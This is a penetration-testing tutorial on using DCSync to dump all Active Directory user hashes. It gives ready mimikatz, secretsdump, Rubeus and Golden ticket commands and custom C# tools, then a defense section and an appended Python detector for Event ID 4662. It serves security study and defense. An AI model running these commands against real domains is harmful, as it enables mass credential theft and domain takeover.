0x00 Preface

---

In a previous article, 'Domain Penetration - DCSync,' the exploitation methods of DCSync were systematically summarized. This article gives a detailed introduction to exporting all domain user hashes with DCSync, analyzes the exploitation approaches available in different environments, and offers defense recommendations.

0x01 Introduction

---

This article will cover the following topics:

  • Exploitation Conditions
  • Exploitation Tools
  • Exploitation Approaches
  • Defense Recommendations

0x02 Exploitation Conditions

---

Obtain permissions for any of the following users:

  • Users within the Administrators group
  • Users in the Domain Admins group
  • Users in the Enterprise Admins group
  • Computer accounts of domain controllers

0x03 Exploitation Tools

---

1. C Implementation (mimikatz)

Implementation code:

https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c#L27

Example commands:

(1) Export hashes of all users in the domain

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

(2) Export hash of the administrator account in the domain

mimikatz.exe "lsadump::dcsync /domain:test.com /user:administrator /csv" exit

2. Python Implementation (secretsdump.py)

Example commands:

python secretsdump.py test/Administrator:[email protected]

3. PowerShell Implementation (MakeMeEnterpriseAdmin)

The core code is implemented in C# and supports the following three functions:

  • Export hash of krbtgt user via DCSync
  • Generate Golden ticket using krbtgt user's hash
  • Import Golden ticket

Note:

My test environment results show that the Golden ticket generation function has a bug: the corresponding permissions cannot be obtained after importing the Golden ticket.

4. C# Implementation

Based on (MakeMeEnterpriseAdmin), I have made the following modifications:

  • Support exporting all user hashes
  • Export domain SID
  • Export all domain user SIDs

The code has been uploaded to GitHub at the following address:

An open-source project

Supplement: Code Development Details

Output all keys and values in the Dictionary:

// Print every key and its value held in the Dictionary
foreach (string key in values.Keys)
{
    Console.WriteLine(string.Format("key:{0} value:{1}", key, values[key]));
}

Convert a byte array to a hex string in order to print a hash:

// ATT_UNICODE_PWD holds the NT hash as raw bytes; print it as an uppercase hex string
byte[] data = values["ATT_UNICODE_PWD"] as byte[];
Console.WriteLine(BitConverter.ToString(data).Replace("-", ""));

Convert a hex string back to a byte array in order to turn a hash into bytes:

// Parse two hex characters per byte back into a byte array
string hex = "D4FE97B4FD50367C7AE8FEF781F27A2E";
var inputByteArray = new byte[hex.Length / 2];
for (var x = 0; x < inputByteArray.Length; x++)
{
    var i = Convert.ToInt32(hex.Substring(x * 2, 2), 16);
    inputByteArray[x] = (byte)i;
}

0x04 Exploitation Approaches

---

1. Execute on a Domain Controller

All tools mentioned in 0x03 can be used.

2. Execute on a Host Inside the Domain

(1) Mimikatz

There are two exploitation approaches:

  • Import a ticket, then execute DCSync
  • Use Overpass-the-hash to launch a script that executes DCSync

(2) secretsdump.py

Execute it directly.

(3) C# Implementation

A ticket must be generated first.

There are two ways to obtain one:

  1. Obtain the hash of the krbtgt user and generate a Golden ticket locally using Mimikatz

Command example:

mimikatz "kerberos::golden /user:Administrator /domain:TEST.COM /sid:S-1-5-21-254706111-4049838133-2416123456 /krbtgt:D4FE97B4FD50367C7AE8FEF781F27A2E /ticket:test.kirbi"

  2. Obtain a high-privilege user and use Rubeus to send a request to obtain a ticket

Command example:

Rubeus.exe asktgt /user:administrator /password:123456 /outfile:test.kirbi
Rubeus.exe asktgt /user:administrator /rc4:D4FE97B4FD50367C7AE8FEF781F27A2E /outfile:test.kirbi

Then import the ticket.

You can choose SharpTGTImporter.cs; the code has been uploaded to GitHub at the following address:

An open-source project

I have made the following modifications based on (MakeMeEnterpriseAdmin):

  • Supports importing specified ticket files

Command example:

SharpTGTImporter.exe test.kirbi

Finally, execute DCSync.

To export all user hashes, you can choose SharpDCSync.cs. The code has been uploaded to GitHub at the following address:

An open-source project

Command example:

SharpDCSync.exe dc1.test.com TEST.COM

To export the krbtgt user hash, you can choose SharpDCSync_krbtgt.cs. The code has been uploaded to GitHub at the following address:

An open-source project

Command example:

SharpDCSync_krbtgt.exe dc1.test.com TEST.COM

3. Execute on a Host Outside the Domain

The method is the same as in "2. Execute on a Host Inside the Domain".

0x05 Defense Recommendations

---

The attacker requires permissions from any of the following users:

  • Users within the Administrators group
  • Users in the Domain Admins group
  • Users in the Enterprise Admins group
  • Computer accounts of domain controllers

Event log detection can be performed by monitoring Event ID 4662 (Directory Service Access) on the domain controllers.
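As an added defender-side example (not code from the original article or its tools), the following Python script parses constructed Event ID 4662 records and flags requests that exercise the replication extended rights a DCSync call needs, while ignoring domain controller computer accounts; the right GUIDs are the well-known schema GUIDs, and the field layout, sample records and allow list are assumptions.

```python
import re

# Extended rights that a DCSync request exercises on the domain object (well-known schema
# GUIDs; the article itself only names Event ID 4662).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # Access Mask bit meaning "Control Access" (an extended right)

def parse_4662(record: str) -> dict:
    """Split one 4662 message body into 'Field' -> value, folding in continuation lines."""
    fields, key = {}, None
    for line in record.splitlines():
        m = re.match(r"\s*([A-Za-z ]+):\s*(.*)$", line)
        if m:
            key = m.group(1).strip()
            fields[key] = m.group(2).strip()
        elif key and line.strip():
            fields[key] += " " + line.strip()
    return fields

def dcsync_rights(record: str, allow_list: tuple = ()) -> list:
    """Return the replication rights requested if the record looks like DCSync, else []."""
    f = parse_4662(record)
    if f.get("Event ID") != "4662" or not int(f.get("Access Mask", "0"), 16) & CONTROL_ACCESS:
        return []
    account = f.get("Account Name", "")
    # Domain controllers replicate legitimately: their computer accounts (trailing '$')
    # and any explicitly allowed accounts (assumed allow list) are not reported.
    if account.endswith("$") or account in allow_list:
        return []
    guids = re.findall(r"\{([0-9a-fA-F-]{36})\}", f.get("Properties", ""))
    return [REPLICATION_RIGHTS[g.lower()] for g in guids if g.lower() in REPLICATION_RIGHTS]

# Constructed sample records (not real log data): DC1 replicating, a user running DCSync,
# and an ordinary property read by the same user (placeholder GUID).
SAMPLE_RECORDS = [
    "Event ID: 4662\nAccount Name: DC1$\nAccess Mask: 0x100\nProperties: Control Access\n"
    "  {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n  {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n",
    "Event ID: 4662\nAccount Name: administrator\nAccess Mask: 0x100\nProperties: Control Access\n"
    "  {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n  {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n",
    "Event ID: 4662\nAccount Name: administrator\nAccess Mask: 0x10\nProperties: Read Property\n"
    "  {00000000-0000-0000-0000-000000000001}\n",
]

def scan(records: list = SAMPLE_RECORDS) -> list:
    """(account, rights) for each record flagged as a DCSync-style replication request."""
    return [(parse_4662(r)["Account Name"], rights) for r in records if (rights := dcsync_rights(r))]
```

In production the same logic would run over records pulled from the Security log of each domain controller, with the allow list populated from the accounts that are expected to replicate.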

References:

https://www.blacklanternsecurity.com/2020-12-04-DCSync/

0x06 Summary

---

This article introduces methods for exporting all user hashes within a domain using DCSync. Based on MakeMeEnterpriseAdmin, SharpTGTImporter.cs and SharpDCSync.cs were developed to simplify exploitation, and defensive recommendations are given alongside the exploitation approaches.